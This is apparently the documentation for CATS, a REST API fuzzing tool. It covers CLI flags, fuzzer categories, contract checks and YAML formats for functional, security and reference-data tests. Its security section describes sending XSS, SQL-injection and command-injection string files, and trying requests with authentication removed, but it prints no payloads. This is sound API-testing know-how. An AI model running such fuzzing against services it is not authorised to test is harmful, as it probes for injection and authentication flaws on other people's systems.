The proxy server's port number (if running behind proxy)--maxRequestsPerMinute
Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000--connectionTimeout
Time period in seconds which CATS should establish a connection with the server; default is 10 seconds--writeTimeout
Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds--readTimeout
Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds--dryRun
If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint--ignoreResponseCodes
HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx
, 4xx
, etc. If provided, all Contract Fuzzers will be skipped.--ignoreResponseSize
SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseWords
COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseLines
LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseRegex
a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--tests
TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder--ignoreResponseCodeUndocumentedCheck
If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN--ignoreResponseBodyCheck
If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN--blackbox
If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
--contentType
A custom mime type if the OpenAPI spec uses content type negotiation versioning.--outoput
The path where the CATS report will be written. Default is cats-report
in the current directory--skipReportingForIgnoredCodes
Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX
> cats --contract=my.yml --server=http://localhost:8080 --checkHeaders
This will run CATS against `http://localhost:8080` using `my.yml` as an API spec and will only run the HTTP headers `Fuzzers`.
To get a list of fuzzers run cats list --fuzzers
. A list of all available fuzzers will be returned, along with a short description for each.
There are multiple categories of `Fuzzers` available:
- `Field Fuzzers` which target request body fields or path parameters
- `Header Fuzzers` which target HTTP headers
- `HTTP Fuzzers` which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as `Fuzzers`:
- `ContractInfo Fuzzers` which check the contract for API good practices
- `Special Fuzzers` a special category which needs further configuration and is focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

CATS has currently 42 registered `Field Fuzzers`:
- `BooleanFieldsFuzzer` - iterate through each Boolean field and send random strings in the targeted field
- `DecimalFieldsLeftBoundaryFuzzer` - iterate through each Number field (either float or double) and send requests with outside-the-range values on the left side in the targeted field
- `DecimalFieldsRightBoundaryFuzzer` - iterate through each Number field (either float or double) and send requests with outside-the-range values on the right side in the targeted field
- `DecimalValuesInIntegerFieldsFuzzer` - iterate through each Integer field and send requests with decimal values in the targeted field
- `EmptyStringValuesInFieldsFuzzer` - iterate through each field and send requests with empty String values in the targeted field
- `ExtremeNegativeValueDecimalFieldsFuzzer` - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
- `ExtremeNegativeValueIntegerFieldsFuzzer` - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
- `ExtremePositiveValueDecimalFieldsFuzzer` - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
- `ExtremePositiveValueInIntegerFieldsFuzzer` - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
- `IntegerFieldsLeftBoundaryFuzzer` - iterate through each Integer field and send requests with outside-the-range values on the left side in the targeted field
- `IntegerFieldsRightBoundaryFuzzer` - iterate through each Integer field and send requests with outside-the-range values on the right side in the targeted field
- `InvalidValuesInEnumsFieldsFuzzer` - iterate through each ENUM field and send invalid values
- `LeadingWhitespacesInFieldsTrimValidateFuzzer` - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
- `LeadingControlCharsInFieldsTrimValidateFuzzer` - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
- `LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values prefixed with single code point emojis
- `LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values prefixed with multi code point emojis
- `MaxLengthExactValuesInStringFieldsFuzzer` - iterate through each String field that has maxLength declared and send requests with values matching the maxLength size/value in the targeted field
- `MaximumExactValuesInNumericFieldsFuzzer` - iterate through each Number and Integer field that has maximum declared and send requests with values matching the maximum size/value in the targeted field
- `MinLengthExactValuesInStringFieldsFuzzer` - iterate through each String field that has minLength declared and send requests with values matching the minLength size/value in the targeted field
- `MinimumExactValuesInNumericFieldsFuzzer` - iterate through each Number and Integer field that has minimum declared and send requests with values matching the minimum size/value in the targeted field
- `NewFieldsFuzzer` - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
- `NullValuesInFieldsFuzzer` - iterate through each field and send requests with null values in the targeted field
- `OnlyControlCharsInFieldsTrimValidateFuzzer` - iterate through each field and send values with control chars only
- `OnlyWhitespacesInFieldsTrimValidateFuzzer` - iterate through each field and send values with unicode separators only
- `OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values with single code point emojis only
- `OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values with multi code point emojis only
- `RemoveFieldsFuzzer` - iterate through each request field and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
- `StringFieldsLeftBoundaryFuzzer` - iterate through each String field and send requests with outside-the-range values on the left side in the targeted field
- `StringFieldsRightBoundaryFuzzer` - iterate through each String field and send requests with outside-the-range values on the right side in the targeted field
- `StringFormatAlmostValidValuesFuzzer` - iterate through each String field, get its 'format' value (i.e. email, ip, uuid, date, datetime, etc) and send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
- `StringFormatTotallyWrongValuesFuzzer` - iterate through each String field, get its 'format' value (i.e. email, ip, uuid, date, datetime, etc) and send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
- `StringsInNumericFieldsFuzzer` - iterate through each Integer (int, long) and Number field (float, double) and send requests having the `fuzz` string value in the targeted field
- `TrailingWhitespacesInFieldsTrimValidateFuzzer` - iterate through each field and send requests with trailing Unicode whitespaces and invisible separators in the targeted field
- `TrailingControlCharsInFieldsTrimValidateFuzzer` - iterate through each field and send requests with trailing Unicode control chars in the targeted field
- `TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values trailed with single code point emojis
- `TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values trailed with multi code point emojis
- `VeryLargeStringsFuzzer` - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
- `WithinControlCharsInFieldsSanitizeValidateFuzzer` - iterate through each field and send values containing unicode control chars
- `WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values containing single code point emojis
- `WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer` - iterate through each field and send values containing multi code point emojis
- `ZalgoTextInStringFieldsValidateSanitizeFuzzer` - iterate through each field and send values containing zalgo text

You can run only these `Fuzzers` by supplying the `--checkFields` argument.
CATS has currently 28 registered `Header Fuzzers`:
- `AbugidasCharsInHeadersFuzzer` - iterate through each header and send requests with abugidas chars in the targeted header
- `CheckSecurityHeadersFuzzer` - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
- `DummyAcceptHeadersFuzzer` - send a request with a dummy Accept header and expect to get a 406 code
- `DummyContentTypeHeadersFuzzer` - send a request with a dummy Content-Type header and expect to get a 415 code
- `DuplicateHeaderFuzzer` - send a 'happy' flow request and duplicate an existing header
- `EmptyStringValuesInHeadersFuzzer` - iterate through each header and send requests with empty String values in the targeted header
- `ExtraHeaderFuzzer` - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
- `LargeValuesInHeadersFuzzer` - iterate through each header and send requests with large values in the targeted header
- `LeadingControlCharsInHeadersFuzzer` - iterate through each header and prefix values with control chars
- `LeadingWhitespacesInHeadersFuzzer` - iterate through each header and prefix values with unicode separators
- `LeadingSpacesInHeadersFuzzer` - iterate through each header and send requests with spaces prefixing the value in the targeted header
- `RemoveHeadersFuzzer` - iterate through each header and remove different combinations of them
- `OnlyControlCharsInHeadersFuzzer` - iterate through each header and replace values with control chars
- `OnlySpacesInHeadersFuzzer` - iterate through each header and replace values with spaces
- `OnlyWhitespacesInHeadersFuzzer` - iterate through each header and replace values with unicode separators
- `TrailingSpacesInHeadersFuzzer` - iterate through each header and send requests with trailing spaces in the targeted header
- `TrailingControlCharsInHeadersFuzzer` - iterate through each header and trail values with control chars
- `TrailingWhitespacesInHeadersFuzzer` - iterate through each header and trail values with unicode separators
- `UnsupportedAcceptHeadersFuzzer` - send a request with an unsupported Accept header and expect to get a 406 code
- `UnsupportedContentTypesHeadersFuzzer` - send a request with an unsupported Content-Type header and expect to get a 415 code
- `ZalgoTextInHeadersFuzzer` - iterate through each header and send requests with zalgo text in the targeted header

You can run only these `Fuzzers` by supplying the `--checkHeaders` argument.
CATS has currently 6 registered `HTTP Fuzzers`:
- `BypassAuthenticationFuzzer` - check if an authentication header is supplied; if yes, try to make requests without it
- `DummyRequestFuzzer` - send a dummy json request {'cats': 'cats'}
- `HappyFuzzer` - send a request with all fields and headers populated
- `HttpMethodsFuzzer` - iterate through each undocumented HTTP method and send an empty request
- `MalformedJsonFuzzer` - send a malformed json request which has the String 'bla' at the end
- `NonRestHttpMethodsFuzzer` - iterate through a list of HTTP methods specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these `Fuzzers` by supplying the `--checkHttp` argument.
Usually a good OpenAPI contract must follow several good practices in order to make it easily digestible by the service clients and act as much as possible as self-sufficient documentation:
- use consistent naming conventions for `json` types and properties
- provide meaningful responses for `POST`, `PATCH` and `PUT` requests
- have some sort of `CorrelationIds/TraceIds` within headers
- avoid `xml` payload unless there is a really good reason (like documenting an old API for example)
- avoid `json` types and properties using the same naming (like having a `Pet` with a property named `pet`)

CATS has currently 9 registered `ContractInfo Fuzzers`:
- `HttpStatusCodeInValidRangeFuzzer` - verifies that all HTTP response codes are within the range of 100 to 599
- `NamingsContractInfoFuzzer` - verifies that all OpenAPI contract elements follow REST API naming good practices
- `PathTagsContractInfoFuzzer` - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
- `RecommendedHeadersContractInfoFuzzer` - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
- `RecommendedHttpCodesContractInfoFuzzer` - verifies that the current path contains all recommended HTTP response codes for all operations
- `SecuritySchemesContractInfoFuzzer` - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
- `TopLevelElementsContractInfoFuzzer` - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
- `VersionsContractInfoFuzzer` - verifies that a given path doesn't contain versioning information
- `XmlContentTypeContractInfoFuzzer` - verifies that all OpenAPI contract paths' responses and requests do not offer `application/xml` as a Content-Type

You can run only these `Fuzzers` using `> cats lint --contract=CONTRACT`.
You can leverage CATS' super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so-called `FunctionalFuzzer`, which is not a `Fuzzer` per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions and assertions, as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payloads, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the `FunctionalFuzzer`. So if there are reference data fields, you must also supply those in the `FunctionalFuzzer` file.

The `FunctionalFuzzer` will only trigger if a valid `functionalFuzzer.yml` file is supplied. The file has the following syntax:
/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: value
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD
And a typical run will look like:
> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080
This is a description of the elements within the `functionalFuzzer.yml` file:
- you can supply a `description` of the test. This will be set as the `Scenario` description. If you don't supply a `description`, the `testNumber` will be used instead.
- you can have multiple tests under the same path: `test1`, `test2`, etc.
- `expectedResponseCode` is mandatory, otherwise the `Fuzzer` will ignore this test. The `expectedResponseCode` tells CATS what to expect from the service when sending this test.
- a property can have multiple values; in the example above `prop7` has 3 values. This will actually result in 3 tests, one for each value.
- if the supplied `httpMethod` doesn't exist in the OpenAPI given path, a `warning` will be issued and no test will be executed
- if the supplied `httpMethod` is not a valid HTTP method, a `warning` will be issued and no test will be executed
- if the request payload uses a `oneOf` element to allow multiple request types, you can control which of the possible types the `FunctionalFuzzer` will apply to using the `oneOfSelection` keyword. The value of the `oneOfSelection` keyword must match the fully qualified name of the `discriminator`.
- if no `oneOfSelection` is supplied, and the request payload accepts multiple `oneOf` elements, then a custom test will be created for each type of payload
- the file uses Json path syntax for all the properties you can supply; you can separate elements through `#` as in the example above instead of `.`
When you have request payloads which can take multiple object types, you can use the oneOfSelection
keyword to specify which of the possible object types is required by the FunctionalFuzzer
. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator
.
As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers
is not possible. Suppose we have an endpoint that creates data (doing a POST
), and we want to check its existence (via GET
). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer
. The `functionalFuzzerFile` can have an `output` entry where you can state a variable name and its fully qualified name from the response in order to set its value. You can then reference the variable using `${variable_name}` from another test in order to use its value.
Here is an example:
/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200
Suppose the test_1
execution outputs:
{
  "pet": {
    "id": 2
  }
}
When executing test_1
the value of the pet id will be stored in the petId
variable (value 2
). When executing test_2
the id
parameter will be replaced with the petId
variable (value 2
) from the previous case.
Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.
The FunctionalFuzzer
can verify more than just the expectedResponseCode
. This is achieved using the verify
element. This is an extended version of the above functionalFuzzer.yml
file.
/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "Baby"
      pet#id: "[0-9]+"
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200
Considering the above file:
- the `FunctionalFuzzer` will check if the response has the 2 elements `pet#name` and `pet#id`
- it will check that `pet#name` has the `Baby` value and that `pet#id` is numeric

The following json response will pass `test_1`:
{
  "pet": {
    "id": 2,
    "name": "Baby"
  }
}
But this one won't (pet#name
is missing):
{
  "pet": {
    "id": 2
  }
}
You can also refer to request fields in the verify
section by using the ${request#..}
qualifier. Using the above example, by having the following verify
section:
/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "${request#name}"
      pet#id: "[0-9]+"
It will verify if the response contains a pet#name
element and that its value equals My Pet
as sent in the request.
Some notes:
- `verify` parameters support Java regexes as values
- if at least one of the `verify` parameters is not present in the response, CATS will report an error
- if all parameters are found and have valid values, but the response code is not the expected one, CATS will report a warning
- if all parameters are found, match their values, and the response code is as expected, CATS will report a success

You can also set `additionalProperties` fields through the `functionalFuzzerFile` using the same syntax as for Setting additionalProperties in Reference Data.
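For illustration, such a test might look like the sketch below; the `metadata` top element and the key-value pairs are hypothetical and would need to match what your service actually accepts:

```yaml
/pet:
  test_1:
    description: Create a Pet with extra metadata
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    additionalProperties:
      # hypothetical wrapper element; topElement is optional
      topElement: metadata
      mapValues:
        # hypothetical key-value pairs sent within the request
        source: "cats-test"
```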
The following keywords are reserved in `FunctionalFuzzer` tests: `output`, `expectedResponseCode`, `httpMethod`, `description`, `oneOfSelection`, `verify`, `additionalProperties`, `topElement` and `mapValues`.
Although CATS is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the `FunctionalFuzzer`: you can use the exact same elements for output variables, test correlation, response verification and so forth, with the addition that you must also specify a `targetFields` and/or `targetFieldTypes` and a `stringsFile` element. A typical `securityFuzzerFile` will look like this:
/pet:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt
And a typical run:
> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080
You can also supply output
, httpMethod
, oneOfSelection
and/or verify
(with the same behaviour as within the FunctionalFuzzer
) if they are relevant to your case.
The file uses Json path syntax for all the properties you can supply; you can separate elements through `#` as in the example instead of `.`.
This is what the `SecurityFuzzer` will do after parsing the above `securityFuzzerFile`:
- it will add the fixed value "My Pet" to the `name` field
- for each field specified in `targetFields`, i.e. `pet#id` and `pet#description`, it will create requests for each line from the `xss.txt` file and supply those values in each field
- considering the `xss.txt` sample file included in the CATS repo, this means that it will send 21 requests targeting `pet#id` and 21 requests targeting `pet#description`, i.e. a total of 42 tests
- for each of these tests, the `SecurityFuzzer` will expect a `200` response code. If another response code is returned, then CATS will report the test as `error`.

If you want the above logic to apply to all paths, you can use `all` as the path name:
all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt
Instead of specifying the field names, you can broaden the scope to target certain field types. For example, if you want to test for XSS in all `string` fields, you can have the following `securityFuzzerFile`:
all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt
As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a `sql_injection.txt`, an `xss.txt`, a `command_injection.txt` and so on. For each of these files, you can create a test entry in the `securityFuzzerFile` where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice, for now, to not include all fields by default.) The `expectedResponseCode` should be tweaked according to your particular context. Your service might sanitize data before validation, so it might be perfectly valid to expect a `200`; or it might validate the fields directly, so it might be perfectly valid to expect a `400`. A `500` will usually mean something was not handled properly and might signal a possible bug.
You can also set additionalProperties
fields through the functionalFuzzerFile
using the same syntax as for Setting additionalProperties in Reference Data.
The following keywords are reserved in `SecurityFuzzer` tests: `output`, `expectedResponseCode`, `httpMethod`, `description`, `verify`, `oneOfSelection`, `targetFields`, `targetFieldTypes`, `stringsFile`, `additionalProperties`, `topElement` and `mapValues`.
The `TemplateFuzzer` can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the `TemplateFuzzer` is as follows (very similar to `curl`):
> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url
The command will:
- send a `POST` request to `http://service-url`
- use the payload `{"field1":"value1","field2":"value2","field3":"value3"}` as a template
- replace, one by one, `field1`, `field2` and `header` with fuzz data and send each request to the service endpoint
- expect `2XX,4XX` response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the `Fuzzer` will run by supplying them using the `-t` argument. For nested objects, supply fully qualified names: `field.subfield`.
Headers can also be fuzzed using the same mechanism as the fields.
This Fuzzer
will send the following type of data:
For a full list of options run > cats fuzz -h
.
You can also supply your own dictionary of data using the -w file
argument.
HTTP methods with bodies will only be fuzzed at the request payload and headers level.
HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d
argument.
This is an example for a GET
request:
> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2
There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData
argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:
/path/0.1/auth:
  prop#subprop: 12
  prop2: 33
  prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
  prop#test: 1
For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer
. Consider this request payload:
{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "cool street"
  },
  "name": "Joe"
}
and the following reference data file:
/path/0.1/auth:
  address#street: "My Street"
  name: "John"
This will result in any fuzzed request to the /path/0.1/auth
endpoint being updated to contain the supplied fixed values:
{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John"
}
The file uses JsonPath syntax for all the properties you can supply; you can separate elements through # as in the example above, instead of the usual . separator.
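The override mechanism can be sketched with a short, hypothetical Python snippet (an approximation, not the actual CATS code):

```python
def apply_ref_data(payload, ref_data):
    """Overlay refData-style fixed values onto a request payload.

    Keys use '#' to separate nested properties (e.g. 'address#street').
    Illustrative approximation only -- not CATS's implementation.
    """
    for key, value in ref_data.items():
        parts = key.split("#")
        node = payload
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return payload

payload = {
    "address": {"phone": "123", "postCode": "408", "street": "cool street"},
    "name": "Joe",
}
fixed = apply_ref_data(payload, {"address#street": "My Street", "name": "John"})
print(fixed["address"]["street"])  # My Street
print(fixed["name"])               # John
```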
You can use environment (system) variables in a ref data file using $$VARIABLE_NAME (note the double $$).
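For example, a hypothetical refData fragment (the AUTH_TOKEN variable name is illustrative) that reads a token from the environment:

```yaml
/path/0.1/auth:
  token: $$AUTH_TOKEN
```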
As additional properties are maps, i.e. they don't actually have a structure, CATS cannot currently generate valid values for them. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:
/path/0.1/auth:
address#street: "My Street"
name: "John"
additionalProperties:
topElement: metadata
mapValues:
test: "value1"
anotherTest: "value2"
The additionalProperties
element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement
is not mandatory. The above example will output the following json (considering also the above examples):
{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John",
"metadata": {
"test": "value1",
"anotherTest": "value2"
}
}
The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.
You can also send the same reference data for ALL paths (just as you do with the headers). You can achieve this by using all as a key in the refData file:
all:
address#zip: 123
This will try to replace address#zip
in all requests (if the field is present).
There are (rare) cases when some fields may not make sense together: if you send firstName and lastName, for example, you may not be allowed to also send name. As OpenAPI has no way to express request fields that are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using cats_remove_field as the value for the fields you want to remove. For the above case the refData file will look as follows:
all:
name: "cats_remove_field"
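A minimal Python sketch of this removal step (hypothetical, not CATS's implementation) might look like:

```python
CATS_REMOVE = "cats_remove_field"

def strip_marked_fields(payload, ref_data):
    # Hypothetical sketch: drop any top-level field whose refData value
    # is the reserved cats_remove_field marker before sending the request.
    for field, value in ref_data.items():
        if value == CATS_REMOVE:
            payload.pop(field, None)
    return payload

request = {"firstName": "Joe", "lastName": "Doe", "name": "Joe Doe"}
cleaned = strip_marked_fields(request, {"name": CATS_REMOVE})
print(sorted(cleaned))  # ['firstName', 'lastName']
```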
You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files that don't require manually setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values, and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variable names with their values, you must supply the --refData file as an argument when the FunctionalFuzzer runs.
> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml
The functionalFuzzer.yml
file:
/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
The refData.yml
file:
/pet-type:
id: ${petId}
After running CATS using the command and the 2 files above, you will get a refData_replaced.yml file where the id gets the value returned in the petId variable.
The refData_replaced.yml
:
/pet-type:
id: 123
You can now use the refData_replaced.yml
as a --refData
file for running CATS with the rest of the Fuzzers.
This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all
element. Specific paths will take precedence over the all
element. Sample headers file:
all:
Accept: application/json
/path/0.1/auth:
jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
jwt: YYYYYYYYYYYYY
This will add the Accept
header to all calls and the jwt
header to the specified paths. You can use environment (system) variables in a headers file using $$VARIABLE_NAME (note the double $$).
DELETE is the only HTTP verb intended to remove resources, and executing the same DELETE request twice will cause the second one to fail, as the resource is no longer available. It would be quite heavy to supply a large list of identifiers within the --refData file, which is why the recommendation used to be to skip the DELETE method when running CATS.
But starting with version 7.0.2, CATS has some intelligence in dealing with DELETE. In order to have enough valid entities, CATS will save the corresponding POST requests in an internal queue, and every time a DELETE request is executed it will poll data from there. For this to actually work, your contract must comply with common-sense conventions:
- The DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
- CATS will try to match the {petId} parameter within the body returned by the POST request while trying various combinations of the petId name. It will search for the following entries: petId, id, pet-id, pet_id, with different cases.
- Once a match is found in the POST result, CATS will replace {petId} with that value.
For example, suppose that a POST to /pets
responds with:
{
"pet_id": 2,
"name": "Chuck"
}
When doing a DELETE
request, CATS will discover that {petId}
and pet_id
are used as identifiers for the Pet
resource, and will do the DELETE
at /pets/2
.
If these conventions are followed (which also align with good REST naming practices), it is expected that DELETE and POST requests will be on par for most of the entities.
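The convention above can be sketched in Python (an illustrative approximation of the matching heuristic, not the actual CATS logic):

```python
import re

def candidate_names(path_param):
    """Name variants that might be tried for '{petId}':
    petId, id, pet-id, pet_id (compared case-insensitively).
    Hypothetical sketch, not the actual CATS algorithm."""
    base = path_param.strip("{}")
    words = re.findall(r"[A-Za-z][a-z]*", base)   # split camelCase
    stem = "".join(w.lower() for w in words[:-1])
    last = words[-1].lower()
    names = {base.lower(), last}
    if stem:
        names |= {f"{stem}-{last}", f"{stem}_{last}"}
    return names

def build_delete_path(post_path, path_param, post_response):
    # Normalise '-' vs '_' so pet-id and pet_id compare equal.
    wanted = {n.replace("-", "_") for n in candidate_names(path_param)}
    for key, value in post_response.items():
        if key.lower().replace("-", "_") in wanted:
            return f"{post_path}/{value}"
    return None

print(build_delete_path("/pets", "{petId}", {"pet_id": 2, "name": "Chuck"}))
# /pets/2
```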
Some APIs might use content negotiation versioning which implies formats like application/v11+json
in the Accept
header.
You can handle this in CATS as follows:
requestBody:
required: true
content:
application/v5+json:
schema:
$ref: '#/components/RequestV5'
application/v6+json:
schema:
$ref: '#/components/RequestV6'
By having a clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".
If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:
requestBody:
required: true
content:
application/json:
schema:
$ref: '#/components/RequestV5'
and you still need to pass the application/v5+json
Accept
header, you can use the --headers
file to add it:
all:
Accept: "application/v5+json"
There isn't a consensus on how services should handle valid values that are prefixed or trailed with spaces. One strategy is to have the service trim the spaces before doing the validation, while other services will validate values exactly as received. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:
- trimAndValidate means that the service will first trim the spaces and after that run the validation
- validateAndTrim means that the service runs the validation first, without any trimming of spaces
This is a global setting, i.e. configured when CATS starts, and all Fuzzers expect consistent behaviour from all the service endpoints.
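The two strategies can be illustrated with a tiny Python sketch (the postcode validator is a made-up example):

```python
def trim_and_validate(raw, validator):
    # Service trims surrounding spaces first, then validates.
    return validator(raw.strip())

def validate_and_trim(raw, validator):
    # Service validates the value exactly as received.
    return validator(raw)

# Hypothetical validator: a post code is exactly three digits.
is_post_code = lambda v: v.isdigit() and len(v) == 3

print(trim_and_validate(" 408 ", is_post_code))   # True
print(validate_and_trim(" 408 ", is_post_code))   # False
```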
There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets
. {version}
is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams
argument. You can supply a ;-separated list of name:value pairs to replace the name parameters with their corresponding value. For example, supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.
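A minimal Python sketch of this substitution (illustrative only, not the CATS code):

```python
def apply_url_params(path_template, url_params):
    # url_params mirrors the --urlParams format: "name:value;name2:value2".
    for pair in url_params.split(";"):
        name, value = pair.split(":", 1)
        path_template = path_template.replace("{" + name + "}", value)
    return path_template

print(apply_url_params("/{version}/pets", "version:v1.0"))  # /v1.0/pets
```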
CATS also supports schemas with oneOf
, allOf
and anyOf
composition. CATS will consider all possible combinations when creating the fuzzed payloads.
The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData
support setting dynamic values for the inner fields. For now the support only exists for java.time.*
and org.apache.commons.lang3.*
, but more types of elements will come in the near future.
